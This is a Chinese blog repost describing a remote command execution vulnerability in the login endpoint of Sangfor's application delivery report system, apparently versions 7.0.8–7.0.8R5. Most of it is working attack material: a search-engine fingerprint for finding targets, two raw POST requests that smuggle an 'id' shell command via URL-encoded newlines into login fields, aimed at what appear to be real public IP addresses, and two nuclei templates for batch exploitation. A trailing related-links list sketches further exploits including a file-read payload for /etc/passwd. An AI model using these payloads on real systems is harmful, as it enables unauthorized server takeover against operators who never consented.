首页 > 其他分享 >应用交付交付管理(报表)系统LOGIN 远程命令执⾏漏洞

应用交付交付管理(报表)系统LOGIN 远程命令执⾏漏洞

时间:2023-08-29 23:46:09浏览次数:31  
标签:BB% E6% E7% 漏洞 537.36 交付 E4% LOGIN login

漏洞描述

深信服 应⽤交付管理系统 login 存在远程命令执⾏漏洞,攻击者通过漏洞可以获取服务器权
限,执⾏任意命令

漏洞影响

深信服 应⽤交付管理系统 7.0.8-7.0.8R5

⽹络测绘

fid="iaytNA57019/kADk8Nev7g=="
登录页面如下:

第一个POC

输入账号密码拦截登录请求包,然后更改数据包。

POST /rep/login HTTP/1.1
Host: 183.36.70.149:85
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Connection: close

clsMode=cls_mode_login%0Aid%0A&index=index&log_type=report&logi
nType=account&page=login&rnd=0&userID=admin&userPsw=123

第二个POC

POST /rep/login HTTP/1.1
Host: 111.22.158.82:85
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Connection: close
Content-Length: 122

clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid%0A&userPsw=tmbhuisq

nuclei批量yaml脚本

id: sangfor_baobiao_RCE_1
info:
  name: 深信服 应用交付管理系统 login 远程命令执行漏洞
  author: mhb17
  severity: critical
  description: 深信服 应用交付管理系统 login 远程命令执行漏洞
  reference:
    - https://peiqi.wgpsec.org/wiki/webapp/%E6%B7%B1%E4%BF%A1%E6%9C%8D/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20login%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
  tags: rce
requests:
  - raw:
      - |-
        POST /rep/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close
        Content-Length: 122

        clsMode=cls_mode_login%0Aid%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123
    matchers-condition: and
    matchers:
      - type: binary
        part: body
        binary:
          - e8be93e5
      - type: word
        part: header
        words:
          - '200'
id: sangfor_baobiao_RCE_2
info:
  name: 深信服 应用交付管理系统 login 远程命令执行漏洞
  author: mhb17
  severity: critical
  description: 深信服 应用交付管理系统 login 远程命令执行漏洞
  reference:
    - https://peiqi.wgpsec.org/wiki/webapp/%E6%B7%B1%E4%BF%A1%E6%9C%8D/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20login%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
  tags: rce
requests:
  - raw:
      - |-
        POST /rep/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close
        Content-Length: 122

        clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid%0A&userPsw=tmbhuisq
    matchers-condition: and
    matchers:
      - type: binary
        part: body
        binary:
          - e8be93e5
      - type: word
        part: header
        words:
          - '200'

标签:BB%,E6%,E7%,漏洞,537.36,交付,E4%,LOGIN,login
From: https://www.cnblogs.com/pursue-security/p/17666138.html

相关文章

  • 深信服应用交付报表系统download.php任意文件读取漏洞
    漏洞描述深信服应用交付报表系统download.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器任意文件。漏洞影响深信服应用交付报表系统漏洞复现fofa搜索环境复现:app="SANGFOR-应用交付报表系统"登录页面:payload:/report/download.php?pdf=../../../../../etc/pa......
  • 辰信景云终端安全管理系统 login SQL注入漏洞
    漏洞描述辰信领创辰信景云终端安全管理系统login存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息漏洞复现fofa语法:"辰信景云终端安全管理系统"&&icon_hash="-429260979"登录页面如下:POC:POST/api/user/loginHTTP/2Host:zy.x1be.comContent-Length:102Sec-......
  • Jeecg-Boot存在前台SQL注入漏洞CVE-2023-1454
    Jeecg-boot简介jeecgBoot是一款基于BPM的低代码平台!前后端分离架构SpringBoot2.x,SpringCloud,AntDesign&Vue,Mybatis-plus,Shiro,JWT,支持微服务。强大的代码生成器让前后端代码一键生成,实现低代码开发!JeecgBoot引领新低代码开发模式OnlineCoding->代码生成器->手工MERGE,帮助J......
  • login;jsessionid=node07a53tu5ba3vd9k0wmsboxmq20.node0
    问题描述:shiro重定向到登入页面,登入地址出现了jsessionid=node07a53tu5ba3vd9k0wmsboxmq20.node0 解决方案:sessionManger中sessionIdUrlRewritingEnabled设置为false即可;<beanid="sessionManager"class="org.apache.shiro.web.session.mgt.DefaultWebSessionManage......
  • jeecg-boot/积木报表基于SSTI的任意代码执行漏洞
    漏洞简介JeecgBoot受影响版本中由于积木报表/jeecg-boot/jmreport/queryFieldBySqlApi接口未进行身份校验,使用Freemarker处理用户用户传入的sql参数,未经授权的攻击者可发送包含恶意sql参数的http请求,通过SSTI在应用端执行任意代码。漏洞复现fofa语法:body="jeecg-b......
  • Http头Hostname攻击漏洞
    作者:Monyer链接:https://www.zhihu.com/question/67477221/answer/254009089来源:知乎著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。这本来是个简单得不能再简单的漏洞。不过遵循题主的诉苦,我去网上找了一圈,的确发现没有一个能把这个问题说清楚,把解决方案......
  • ThinkPHP 多语言本地文件包含漏洞
    ThinkPHP多语言本地文件包含漏洞ThinkPHP是一个再中国使用比较多的PHP框架。在其6.0.13版本及以前,存在一处本地文件包含漏洞。当多语言特性被开启时,攻击者可以使用lang参数来包含任意php文件。虽然只能包含本地PHP文件,但在开启了register_argc_argv且安装了pcel/pear的环境下,可......
  • 网神SecGate 3600防火墙obj_app_upfile任意文件上传漏洞
    漏洞简介网神SecGate3600防火墙obj_app_upfile接口存在任意文件上传漏洞,攻击者通过构造特殊请求包即可获取服务器权限影响范围网神SecGate3600防火墙漏洞复现fofa语法:fid="1Lh1LHi6yfkhiO83I59AYg=="登录页面如下:POC:POST/?g=obj_app_upfileHTTP/1.1Host:jg.zhon......
  • ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
    ThinkPHP5SQL注入漏洞&&敏感信息泄露启动后,访问http://10.10.10.154/index.php?ids[]=1&ids[]=2,即可看到用户名被显示了出来,说明环境运行成功。漏洞利用访问http://10.10.10.154/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1,信息成功被爆出:当然,这是一个比较鸡......
  • 漏洞名词扫盲(转载)
    作者:Michael链接:https://www.zhihu.com/question/37413342/answer/2972231175来源:知乎POC、EXP、Payload与ShellcodePOC:全称'ProofofConcept',中文'概念验证',常指一段漏洞证明的代码。EXP:全称'Exploit',中文'利用',指利用系统漏洞进行攻击的动作。Payload:中文......